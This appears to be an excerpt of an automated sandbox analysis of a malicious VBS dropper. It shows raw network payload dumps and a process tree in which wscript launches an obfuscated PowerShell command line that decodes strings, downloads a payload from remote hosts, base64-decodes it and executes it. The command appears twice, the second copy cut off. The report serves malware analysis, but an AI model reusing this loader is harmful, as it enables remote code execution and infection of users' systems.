2025-04-08 06:12:30 UTC | 16384 | IN | Data Raw: 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 32 6b 73 37 4e 42 36 61 32 4f 76 57 46 69 35 74 30 47 72 49 2b 35 73 54 4c 67 65 51 48 35 69 5a 69 78 4d 67 63 62 2f 65 39 59 67 4f 70 61 76 73 47 34 69 45 42 69 33 41 33 57 6e 49 77 30 73 32 55 2f 75 70 58 6b 41 53 62 74 39 4a 70 56 46 50 33 58 34 78 37 61 37 4b 58 62 73 67 2b 34 54 76 2b 49 7a 66 67 55 6f 35 34 41 43 53 4f 48 5a 32 66 48 6f 63 77 45 61 49 4b 62 41 6a 48 6c 56 4c 62 62 4e 68 4a 4b 4f 68 4f 30 69 64 62 6e 79 4a 34 6c 59 45 72 76 35 36 44 56 4b 38 50 4e 2b 54 64 36 37 42 42 59 78 30 4e 35 50 37 74 4f 64 57 38 77 32 77 44 53 69 78 70 4d 44 65 6b 75 31 6f 4c 33 75 2b 31 73 71 77 43 30 37 4d 66 36 4a 41 78 75 41 71 72 6b 44 7a 63 4f 53 69 67 48 62 6b 46 66 4f 65 61 71 6e
Data Ascii: tXbTDbV20w21dtMNtXbTDbV22ks7NB6a2OvWFi5t0GrI+5sTLgeQH5iZixMgcb/e9YgOpavsG4iEBi3A3WnIw0s2U/upXkASbt9JpVFP3X4x7a7KXbsg+4Tv+IzfgUo54ACSOHZ2fHocwEaIKbAjHlVLbbNhJKOhO0idbnyJ4lYErv56DVK8PN+Td67BBYx0N5P7tOdW8w2wDSixpMDeku1oL3u+1sqwC07Mf6JAxuAqrkDzcOSigHbkFfOeaqn
2025-04-08 06:12:30 UTC | 16384 | IN | Data Raw: 30 5a 64 48 5a 42 33 73 56 6c 67 39 37 34 55 74 6c 58 62 62 6b 5a 42 4e 62 4c 39 5a 42 44 36 53 62 57 6e 71 6e 33 50 51 6e 70 4b 39 61 75 7a 42 62 61 5a 4f 6b 6f 31 6f 61 50 2b 56 56 76 36 54 72 57 6e 71 39 33 62 7a 2f 70 4f 77 62 78 75 54 70 65 64 4b 31 66 6c 42 30 76 30 38 45 59 48 63 79 73 71 57 6f 46 76 4a 46 36 58 33 30 33 7a 77 44 30 68 68 6a 6b 6e 36 6f 63 72 6d 2f 59 75 68 51 6c 44 66 2b 48 7a 4f 70 7a 58 35 77 30 56 75 4b 47 4e 6d 4a 51 77 67 38 79 32 31 64 69 4d 63 31 4d 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 38 4d 69 41 61 73 2f 6e 6d 46 69 55 62 38 43 78 49 2b 61 73 53 6f 36 75 48 36 48 6a 6f 57 78 4b 70 51 35 54 5a 63 78 59 6c 63 2b 31 70 7a 6c 43 46 77 48 37
Data Ascii: 0ZdHZB3sVlg974UtlXbbkZBNbL9ZBD6SbWnqn3PQnpK9auzBbaZOko1oaP+VVv6TrWnq93bz/pOwbxuTpedK1flB0v08EYHcysqWoFvJF6X303zwD0hhjkn6ocrm/YuhQlDf+HzOpzX5w0VuKGNmJQwg8y21diMc1MbTDbV20w21dtMNtXbTDbV20w21dtMNtXbTDbV20w28MiAas/nmFiUb8CxI+asSo6uH6HjoWxKpQ5TZcxYlc+1pzlCFwH7
2025-04-08 06:12:30 UTC | 16384 | IN | Data Raw: 6d 59 39 4d 35 2b 4a 46 4c 47 41 42 35 4b 59 49 46 73 44 46 2b 63 6b 50 54 70 77 6a 66 71 38 30 51 41 38 6a 39 64 42 5a 54 4c 48 59 61 42 75 6d 76 58 38 2f 49 55 7a 70 4f 56 71 47 69 62 36 35 4a 77 50 57 72 67 4e 67 4a 33 48 4d 36 30 4b 62 76 51 72 71 2b 4d 79 47 4b 32 57 69 6f 5a 44 79 74 58 62 54 39 57 34 37 54 50 4a 4e 37 51 39 64 70 58 62 59 2f 74 79 37 47 54 76 56 67 4b 2b 65 4b 55 37 4d 66 70 79 37 47 54 57 69 6f 64 38 6c 4a 58 62 54 39 57 36 63 51 31 32 31 67 4b 34 4f 4f 64 62 4d 70 51 36 71 67 78 32 31 65 71 4d 6f 6a 6a 73 46 68 61 4b 68 6b 37 46 56 64 74 50 31 51 6e 74 4d 38 6b 57 4c 6a 76 4c 5a 4d 4e 32 2f 32 59 46 41 4b 58 39 47 49 36 67 73 54 33 6b 34 41 5a 79 41 76 32 41 44 6f 37 4a 4a 6d 64 36 44 73 76 35 79 6a 51 62 6c 66 7a 71 74 51 79 64
Data Ascii: mY9M5+JFLGAB5KYIFsDF+ckPTpwjfq80QA8j9dBZTLHYaBumvX8/IUzpOVqGib65JwPWrgNgJ3HM60KbvQrq+MyGK2WioZDytXbT9W47TPJN7Q9dpXbY/ty7GTvVgK+eKU7Mfpy7GTWiod8lJXbT9W6cQ121gK4OOdbMpQ6qgx21eqMojjsFhaKhk7FVdtP1QntM8kWLjvLZMN2/2YFAKX9GI6gsT3k4AZyAv2ADo7JJmd6Dsv5yjQblfzqtQyd
2025-04-08 06:12:30 UTC | 16384 | IN | Data Raw: 4b 32 37 63 31 62 31 68 42 41 2b 4a 31 74 4d 4e 54 59 54 45 72 65 56 36 71 31 41 46 5a 74 4d 43 4f 70 41 48 31 61 4b 68 45 72 53 56 64 74 50 31 61 2b 39 4d 38 6b 69 5a 64 57 34 6f 2f 73 6e 51 42 57 62 54 41 75 71 51 42 39 76 56 69 31 78 35 69 6f 34 4f 76 61 56 32 31 46 4c 42 53 71 4d 79 51 61 62 61 70 61 4b 69 57 57 46 56 64 74 50 31 2f 4e 4c 54 48 62 57 4c 44 64 58 35 33 73 54 5a 4e 2b 71 7a 44 62 57 4f 6d 34 6d 31 5a 74 73 65 6a 78 38 41 66 58 31 35 5a 6d 42 61 7a 73 54 5a 4e 66 56 54 44 62 57 4f 6c 41 6d 31 5a 74 74 43 65 51 36 4b 6e 61 56 32 32 53 58 4c 62 77 73 61 59 6a 6a 51 33 62 56 32 4b 2f 73 76 36 53 7a 77 4b 70 36 50 4d 6a 31 73 43 70 32 6c 64 74 72 31 79 32 38 41 6b 42 57 49 4c 35 57 69 6f 52 47 30 74 58 62 54 39 55 41 76 54 50 4a 4e 65 55 35
                                    2025-04-08 06:12:30 UTC16384INData Raw: 4b 32 37 63 31 62 31 68 42 41 2b 4a 31 74 4d 4e 54 59 54 45 72 65 56 36 71 31 41 46 5a 74 4d 43 4f 70 41 48 31 61 4b 68 45 72 53 56 64 74 50 31 61 2b 39 4d 38 6b 69 5a 64 57 34 6f 2f 73 6e 51 42 57 62 54 41 75 71 51 42 39 76 56 69 31 78 35 69 6f 34 4f 76 61 56 32 31 46 4c 42 53 71 4d 79 51 61 62 61 70 61 4b 69 57 57 46 56 64 74 50 31 2f 4e 4c 54 48 62 57 4c 44 64 58 35 33 73 54 5a 4e 2b 71 7a 44 62 57 4f 6d 34 6d 31 5a 74 73 65 6a 78 38 41 66 58 31 35 5a 6d 42 61 7a 73 54 5a 4e 66 56 54 44 62 57 4f 6c 41 6d 31 5a 74 74 43 65 51 36 4b 6e 61 56 32 32 53 58 4c 62 77 73 61 59 6a 6a 51 33 62 56 32 4b 2f 73 76 36 53 7a 77 4b 70 36 50 4d 6a 31 73 43 70 32 6c 64 74 72 31 79 32 38 41 6b 42 57 49 4c 35 57 69 6f 52 47 30 74 58 62 54 39 55 41 76 54 50 4a 4e 65 55 35
                                    Data Ascii: K27c1b1hBA+J1tMNTYTEreV6q1AFZtMCOpAH1aKhErSVdtP1a+9M8kiZdW4o/snQBWbTAuqQB9vVi1x5io4OvaV21FLBSqMyQabapaKiWWFVdtP1/NLTHbWLDdX53sTZN+qzDbWOm4m1Ztsejx8AfX15ZmBazsTZNfVTDbWOlAm1ZttCeQ6KnaV22SXLbwsaYjjQ3bV2K/sv6SzwKp6PMj1sCp2ldtr1y28AkBWIL5WioRG0tXbT9UAvTPJNeU5
                                    2025-04-08 06:12:30 UTC16384INData Raw: 74 58 59 72 53 54 31 35 4c 50 37 70 4c 73 36 37 68 75 70 65 73 34 31 68 42 41 52 6c 31 74 4d 4e 54 59 65 48 72 65 56 36 38 67 32 36 47 73 45 49 33 70 70 42 76 63 37 62 54 4f 57 71 45 4b 37 72 75 6d 39 75 73 35 31 71 75 6b 4f 67 43 74 56 74 53 69 6c 72 45 31 46 62 75 50 30 46 67 4c 37 49 76 4c 35 4e 44 53 5a 2f 42 57 58 70 38 5a 4d 73 48 38 77 52 69 74 43 41 6f 4e 37 61 7a 47 47 62 6e 49 42 55 55 53 58 6e 41 52 38 57 59 62 6c 4e 45 77 43 2f 2b 35 38 5a 6c 64 34 63 33 72 31 41 62 57 6c 4c 74 66 55 41 6c 6f 57 69 6f 52 42 57 35 58 62 54 39 57 30 67 54 50 4a 41 6b 2b 69 37 48 69 37 7a 6f 6f 57 42 50 35 57 71 53 6e 6b 63 68 50 43 7a 2b 6f 67 72 65 78 4d 4a 6b 46 72 67 47 4f 68 4c 45 6f 6b 70 57 48 4d 6f 71 73 73 53 68 41 50 33 55 46 4d 57 4c 63 46 77 48 78 75
                                    Data Ascii: tXYrST15LP7pLs67hupes41hBARl1tMNTYeHreV68g26GsEI3ppBvc7bTOWqEK7rum9us51qukOgCtVtSilrE1FbuP0FgL7IvL5NDSZ/BWXp8ZMsH8wRitCAoN7azGGbnIBUUSXnAR8WYblNEwC/+58Zld4c3r1AbWlLtfUAloWioRBW5XbT9W0gTPJAk+i7Hi7zooWBP5WqSnkchPCz+ogrexMJkFrgGOhLEokpWHMoqssShAP3UFMWLcFwHxu
                                    2025-04-08 06:12:30 UTC16384INData Raw: 32 6e 44 52 55 4a 73 32 54 45 38 4d 7a 6f 6a 79 43 58 69 49 55 65 55 4e 77 62 36 67 47 79 4e 30 44 74 4f 47 6c 51 54 2b 7a 54 4a 4b 68 74 4d 49 33 70 58 47 50 72 41 72 54 4b 57 71 48 2f 2b 7a 6c 41 43 7a 38 6d 67 75 7a 47 54 66 59 4b 42 55 43 4d 6a 72 45 64 6e 4b 70 36 55 34 6d 73 59 6b 66 65 6a 7a 6e 70 79 6c 54 70 71 6c 75 7a 51 34 7a 52 57 4c 72 6f 64 42 39 45 4d 6c 33 76 56 75 4f 77 4f 49 73 56 6b 64 30 6f 70 4b 61 33 53 61 45 56 59 4a 36 47 48 39 75 72 71 4e 73 4c 43 52 4d 4e 36 64 65 46 33 6a 41 6b 4d 33 43 35 4e 4e 74 59 71 67 59 6f 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 45 2b 78 51 6b 55 4a 7a 75 61 76 79 31 74 74 4d 4e 6a 49 62 54 6a 62 56 7a 4d 78 4b 4e 37 67 35
                                    Data Ascii: 2nDRUJs2TE8MzojyCXiIUeUNwb6gGyN0DtOGlQT+zTJKhtMI3pXGPrArTKWqH/+zlACz8mguzGTfYKBUCMjrEdnKp6U4msYkfejznpylTpqluzQ4zRWLrodB9EMl3vVuOwOIsVkd0opKa3SaEVYJ6GH9urqNsLCRMN6deF3jAkM3C5NNtYqgYoV20w21dtMNtXbTDbV20w21dtMNtXbTDbV20w21dtME+xQkUJzuavy1ttMNjIbTjbVzMxKN7g5


                                    Target ID:0
                                    Start time:02:12:20
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"
                                    Imagebase:0x7ff65e5f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:02:12:21
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
                                    Imagebase:0x7ff75cef0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:02:12:21
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff74be10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:02:12:21
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping 127.0.0.1
                                    Imagebase:0x7ff65e550000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:02:12:24
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef 
tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R 
kninASh,wpir ecretrFarvebiEsti evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee 
Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. 
MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;"
                                    Imagebase:0x7ff745e70000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:02:12:24
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff74be10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:02:12:35
                                    Start date:08/04/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef 
tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R 
